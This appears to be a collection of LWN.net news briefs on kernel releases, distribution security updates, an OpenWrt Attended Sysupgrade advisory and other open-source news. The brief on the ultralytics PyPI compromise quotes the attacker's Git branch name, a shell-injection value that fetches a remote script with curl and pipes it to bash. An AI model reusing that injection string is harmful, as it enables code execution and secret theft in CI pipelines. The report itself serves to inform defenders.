Linux Weekly News

The OpenWrt project has issued an advisory regarding a vulnerability found in its Attended Sysupgrade Server that could allow compromised packages to be installed on a router by an attacker. No official OpenWrt images were affected, and the vulnerability is not known to be exploited, but users who have installed images created with an instance of this server are recommended to reinstall.

For a detailed description of how the exploit works, see this blog post.

Then, as the hash collision occurred, the server returns the overwritten build artifact to the legitimate request that requests the following packages. [...]

By abusing this, an attacker could force the user to upgrade to the malicious firmware, which could lead to the compromise of the device.

The 6.12.4 and 6.6.64 stable kernels have been released, each with a set of important fixes throughout the kernel tree, as usual.

The 6.13-rc2 kernel prepatch is out for testing. "The diffstat looks a bit unusual with 80%+ drivers, and a lot of it one-liners, but that's actually just because of a couple of automated scripts that got run after -rc1 for some cleanups. Nothing particularly interesting, but it makes for a lot of noise in the diff." One of those scripts was the EXPORT_SYMBOL_NS() change (to make it use a quoted string for the namespace name) described in this article.

Security updates have been issued by AlmaLinux (redis:7, ruby, ruby:2.5, and ruby:3.1), Debian (avahi, ceph, chromium, gsl, jinja2, php7.4, renderdoc, ruby-doorkeeper, and zabbix), Fedora (chromium, python3.11, and uv), Gentoo (Asterisk, Cacti, Chromium, Google Chrome, Microsoft Edge. Opera, Dnsmasq, firefox, HashiCorp Consul, icinga2, OATH Toolkit, OpenJDK, PostgreSQL, R, Salt, Spidermonkey, and thunderbird), Mageia (kubernetes), Red Hat (grafana, grafana-pcp, osbuild-composer, and postgresql), SUSE (ansible-core, firefox, glib2, java-1_8_0-ibm, kernel-firmware, nanopb, netty, python310-django-ckeditor, python310-jupyter-ydoc, radare2, skopeo, and webkit2gtk3), and Ubuntu (tinyproxy).

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script.

This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.

Greg Kroah-Hartman released version 6.12.3 of the kernel to fix a regression that can cause some machines to fail to boot on version 6.12.2. The other stable branches are continuing on their normal cadence, with 6.12.4-rc1 and 6.6.64-rc1 starting review today.

The page structure sits at the core of the kernel's memory-management subsystem (for now), and a key part of that structure is its reference count, stored in refcount. The page reference count tells the kernel how many users a given page has and when it can be freed. That count is not needed for every page in the system, though. Matthew Wilcox has recently resurrected an old patch set that expands the concept of a "frozen" page — one that lacks a meaningful reference count — to the immediate benefit of the slab allocator but in the service of a longer-term goal as well.

Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).

Apertis is a Collabora-developed Debian derivative distribution designed to be incorporated into electronic devices; the v2024 release is now available. It is now based on the Bookworm release, and includes support for Podman, ONNX Runtime, OP-TEE, and more.

Apertis relies on the Debian Free Software Guidelines to ensure all software shipped is open source or, in limited cases, at least freely distributable. However, for some customers this is not enough to be able to adopt OSS solutions as in their evaluations some provisions in common licenses like the GPL-3 are at odds with regulatory constraints they are subject to. Apertis does not set to solve this decades-long debate, and instead its goal is to increase the adoption of modern, maintained OSS solutions in markets where this has historically been a challenge. To enable this, Apertis supports avoiding the use of any software under some licenses (like the [GPL v3.0 license family) on target images, while still making them fully available for development and for customers that do not share those licensing concerns. To avoid these licenses, Apertis uses more modern alternatives instead of relying on outdated and unmaintained pre-GPL-3 versions. For instance, coreutils and findutils (GPL-3+) are replaced in Apertis by rust-coreutils and rust-findutils.

In July, Let's Encrypt announced it was ending support "as soon as possible" for the Online Certificate Status Protocol (OCSP) in favor of Certificate Revocation Lists (CRLs) due to privacy concerns. The organization has now announced that it has set a timeline, and will be turning off its OCSP responders on August 6, 2025. There is additional action required for Let's Encrypt users who use the OCSP Must Staple Extension:

As of January 30, 2025, issuance requests that include the OCSP Must Staple extension will fail, unless the requesting account has previously issued a certificate containing the OCSP Must Staple extension.

As of May 7, all issuance requests that include the OCSP Must Staple extension will fail, including renewals. Please change your ACME client configuration to not request the extension.

System76 has announced the fourth alpha release of its Rust-based COSMIC desktop. New features in this version include the ability to set default applications, region and language settings, a new Accessibility applet, as well as support for variable refresh rate (VRR) in the cosmic-comp compositor and the display settings tool. See the blog post for a full list of fixes and performance improvements. LWN covered the first alpha release in August.

It has long been said that naming things is one of the hard things to do in computer science. That may be so, but it pales in comparison to the challenge of handling usernames properly in applications. This is especially true when multiple applications are involved, and they are all supposed to agree on what characters are, and are not, allowed. The Debian project is facing that problem right now, as two user-creation utilities disagreed about which names are allowable. A plan is in place to sort this out before the release of Debian 13 ("trixie") sometime next year.

Mozilla would appear to have concluded that the solution to its problems is an extensive rebranding effort:

We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy and expression embody our role as a leader in digital rights and innovation, putting people over profits through privacy-preserving products, open-source developer tools, and community-building efforts.

Greg Kroah-Hartman has released the 6.12.2, 6.11.11, and 4.19.325 stable kernels. Note that both 6.11.11 and 4.19.325 are the last kernels in those series, "please move off to a newer kernel version". In the 4.19.325 release notice, he has a rather longer-than-usual message, including: As a "fun" proof that this one is finished (and that any company saying they care about it really should have their statements validated with facts), I looked at the "unfixed" CVEs from this kernel release. Currently it is a list 983 CVEs long, too long to list here.

You can verify it yourself by cloning the vulns.git repo at git.kernel.org and running: ./scripts/strak v4.19.325 Note, this does NOT count the hardware CVEs which kernel.org does not track, and many are sill unfixed in this kernel branch.

Security updates have been issued by Fedora (thunderbird, tuned, and webkitgtk), Mageia (python-aiohttp and qemu), Oracle (container-tools:ol8, firefox, java-1.8.0-openjdk, java-11-openjdk, kernel, kernel:4.18.0, krb5, pam, postgresql:16, python-tornado, python3:3.6.8, thunderbird, tigervnc, tuned, and webkit2gtk3), Red Hat (bzip2, postgresql, postgresql:13, postgresql:15, postgresql:16, python-tornado, and ruby:3.1), Slackware (python3), SUSE (postgresql, postgresql16, postgresql17, postgresql13, postgresql14, postgresql15, python-python-multipart, and python3), and Ubuntu (python-django and recutils).

The LWN.net Weekly Edition for December 5, 2024 is available.

Fedora Project Leader Matthew Miller reports that the project's search to replace Pagure as its git forge is almost complete, with the Fedora Council strongly in favor of Forgejo:

The Council, currently, has a clear preference for Forgejo. This is a big decision and we don't want it to feel rushed. Therefore, we're opening this up one last time to everyone's comments. After two weeks, we'll take our formal vote — and then get on with the work!

LWN looked at Forgejo in February.

Linus Walleij writes about a pair of security features for 32-bit Arm systems; these landed in 6.10, but, he says, have now stabilized to the point that distributors may want to enable them.

PAN is an abbreviation for the somewhat grammatically incorrect Privileged Access Never. [...]

For modern ARM32 systems with large memories configured to use LPAE nothing like PAN was available: this version of the MMU simply did not implement a PAN option.

As of the patch originally developed by Catalin Marinas, we deploy a scheme that will use the fact that LPAE has two separate translation table base registers (TTBR:s): one for userspace (TTBR0) and one for kernelspace (TTBR1).

Linux offers two broad ways of performing I/O to files. Buffered I/O, which is the usual way of accessing a file, stores a copy of the transferred data in the kernel's page cache to speed future accesses. Direct I/O, instead, moves data directly between the storage device and a user-space buffer, avoiding the page cache. Both modes have their advantages and disadvantages. In 2019, Jens Axboe proposed an uncached buffered mode to get some of the advantages of both, but that effort stalled at the time. Now, uncached buffered I/O is back with some impressive performance results behind it.

Version 6.0.0 of the Hurl command-line tool has been released. Hurl is curl-powered utility that runs HTTP requests and tests defined in a plain-text Hurl file. Notable features in this release include the ability to generate dynamic values with functions, shorter syntax, and an option to export Hurl files to a list of curl commands. See the release notes for a full list of changes and downloads.